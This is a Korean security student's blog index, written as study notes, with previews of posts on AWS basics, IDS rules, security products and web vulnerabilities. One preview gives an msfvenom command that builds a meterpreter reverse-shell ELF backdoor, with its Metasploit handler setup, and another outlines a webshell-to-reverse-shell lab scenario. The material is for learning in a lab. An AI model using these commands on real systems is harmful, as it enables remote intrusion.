클로이의 정보보안/클라우드 공부노트 클로이의 정보보안/클라우드 공부노트

Private 서버 접속 방법 1) 2) 3) Load Balancing 일반적으로 로드 밸런싱이란, 컴퓨터 네트워크 기술의 일종으로 둘 혹은 셋이상의 중앙처리장치 혹은 저장장치와 같은 컴퓨터 자원들에게 작업을 나누는 것을 의미한다. AWS의 Elastic Load Balancing은 둘 이상의 가용 영역에서 EC2 인스턴스, 컨테이너, IP 주소 등 여러 대상에 걸쳐 수신되는 트래픽을 자동으로 분산합니다. 등록된 대상의 상태를 모니터링하면서 상태가 양호한 대상으로만 트래픽을 라우팅합니다. Auto Scaling Amazon EC2 Auto Scaling을 사용하면 애플리케이션의 로드를 처리할 수 있는 정확한 수의 Amazon EC2 인스턴스를 유지할 수 있습니다.

IaaS(Infrastructure-as-a-Service) > 클라우드 제공 업체로부터 서버와 저장소를 임대 > 자체 애플리케이션을 직접 구축/개발 Rigion? EC2 (Elastic Compute Cloud) : 컴퓨팅 용량을 제공하는 서비스로, 자유롭게 SW를 설치하고 시스템을 구축할 수 있으며 이미 세팅된 서버를 사용하는 것도 가능하다. S3 (Simple Storage Service) : 오브젝트 스토리지 서비스로, 웹 서버 및 파일 서버용 파일을 보관하는 스토리지로 사용할 수 있다. VPC (Virtual Private Cloud) : 네트워크 환경 설정 Public Subnet : 해당 서브넷의 인스턴스는 인터넷에 바로 아웃바운드 트래픽 전송 가능 Private Subnet : NAT(Ne..

보안로그&시나리오 모의해킹 Window Event Viewer - Security - Log Properties에서 Log 경로 확인 1) Account Policy 2) Local Policy 실습을 위해 Security Setting (default 값: No auditing) 변경 1) Dev-net 의 NAT forward rule 삭제(접속허용) 2) HFS 이용, DMZ 쪽에서 소스코드를 가져가는 상황 3-1) bWAPP 파일 업로드 취약점을 이용 -> 웹쉘 업로드 (webshell master의 b37k 활용) 3-2) 웹쉘 이용 -> 웹 서버->공격자 리버스 커넥션 3-3) ELF 백도어로 meterpreter 연결

Snort? 오픈소스 기반의 IDS이자 IPS -작동 방식 스니퍼 -> 패킷디코더 -> 전처리기 -> 탐지엔진 -> 경고/로깅 Sniffer : 네트워크 패킷 수집 Packet Decoder : 전처리기와 탐지엔진이 파싱할 수 있도록 정규화 Preprocessor(전처리기) : 의심 패킷을 탐지 엔진으로 전송 Detection Engine(탐지엔진) : 전달받은 패킷을 스노트 규칙과 매칭되는지 확인 Alert/Log : 매칭된 경우 경고출력 및 기록 Suricata? OISF에서 개발한 시그니처 기반 네트워크 침입탐지 시스템 LUA 언어로 시그니처 작성 멀티 코어/ 멀티 스레드 지원하여 대용량 트래픽 처리 가능 Snort Rule 작성 1) 프로토콜 2) 방향 연산자 3)

방화벽(Firewall) - IP, Port 기준으로 접근제어 설정!! 안티DDS - DDos 공격을 차단(방어)하기 위한 솔루션!! 침입탐지(차단) 시스템 - IDS, IPS 보안 솔루션 Snort, Suricata 룰 기반 -> AI(?)..... WAF(Web Aapplication Firewall) - union, select... 통합로그 시스템(Splunk, ELK 등).. 공격 회수 임계치... FDS.. APT 공격 솔루션 웹쉘 차단 솔루션 무선 AP 보안 솔루션 (WIPS) 개인PC솔루션 DRM (문서보안) DLP (문서내 중요정보 탐지) 개인정보검색 솔루션 백신 - 악성코드 NAC - 개인PC통제 솔루션 망분리(망연계망 솔루션) 고민해 볼 것? DMZ내의 웹서버 허용 범위 일반적으로 8..

악성코드를 제작 sudo msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.126.129 LPORT=5555 -f elf > a.elf msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp PAYLOAD => linux/x86/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 192.168.126.130 LHOST => 192.168.126.130 ..

게시판에서 발생 가능한 취약점 - 인증 처리 미흡(권한 탈취) - XSS - SQL Injection - File Upload - File Download : 1) 다운로드시 입력값 검증 미흡 2) 디렉토리 접근 (ex. 주요 소스코드, DB연결정보, 유저정보, 설정파일 등) ex) 관리자 페이지 : member.asp, list.asp, connection.asp, con.asp, conn.asp··· [Remote File Include/Local File Include] bWAPP 문제풀이 security level 2에서만 필터링이 적용됨